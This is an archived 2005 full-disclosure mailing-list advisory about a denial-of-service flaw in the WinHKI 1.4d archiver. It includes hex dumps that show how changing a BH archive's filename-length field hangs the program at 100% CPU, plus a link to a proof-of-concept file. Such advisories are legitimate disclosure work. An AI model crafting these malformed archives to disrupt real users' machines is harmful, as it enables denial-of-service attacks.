[<prev] [next>] [day] [month] [year] [list]
Message-ID: <001b01c4f3c7$78d0d550$f85ab350@noone>
Date: Thu, 06 Jan 2005 10:12:32 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "vulnwatch@...nwatch.org"
<vulnwatch-sc.1097601039.nlfjiamkpajpknbgkcnk-theinsider=012.net.il@...nwatch.org>,
Windows NTBugtraq Mailing List <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>,
list@...uriteam.com, full-disclosure@...ts.netsys.com,
bugtraq@...urityfocus.com, bugs@...uritytracker.com
Subject: WinHKI BH File Incorrect Filename Handeling Leads
to 100 CPU%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: WinHKI
Vendors: http://www.webtoolmaster.com
Versions: 1.4d
Platforms: Windows
Bug: BH File Incorrect Filename Handeling Leads to 100 CPU%
Exploitation: Local (extract file)
Date: 24 Dec 2004
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@...l.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ
compressions.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
This is a normal BH compressed file header
00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../107.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507 7100 2507 0300 ...r..BH..q.%...
00000050 0094 A484 3100 0000 0000 0000 0000 0000 ....1...........
00000060 0010 0000 0000 004C 0000 002F 446F 6375 .......L.../Docu
The last byte in the following code, specifies the length of the
compressed file name. Once it doesn't match the filename's length
WinHKI goes into 100 CPU%
00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../107.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507
All we need to do is change the length of the filename specified
inside the file. Where this is the part which specifies the file name:
00000000 4248 0507 2D00 2507 0302 0839 7378 3119 BH..-.%....9sx1.
00000010 0000 001B 0000 00E8 5F41 5C20 0000 0000 ........_A\ ....
00000020 0008 0000 002F 3130 372E 6874 6DB3 294E ...../1077.htm.)N
00000030 2ECA 2C28 C9B6 4BCC 492D 2AD1 D0B4 D187 ..,(..K.I-*.....
00000040 08D8 F172 0100 4248 0507 7100 2507 0300 ...r..BH..q.%...
00000050 0094 A484 3100 0000 0000 0000 0000 0000 ....1...........
00000060 0010 0000 0000 004C 0000 002F 446F 6375 .......L.../Docu
Using any Hex editor such as HexWorkshop, just add anything to the filename.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
An online proof of concept can be found at:
http://theinsider.deep-ice.com/poc.bh
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists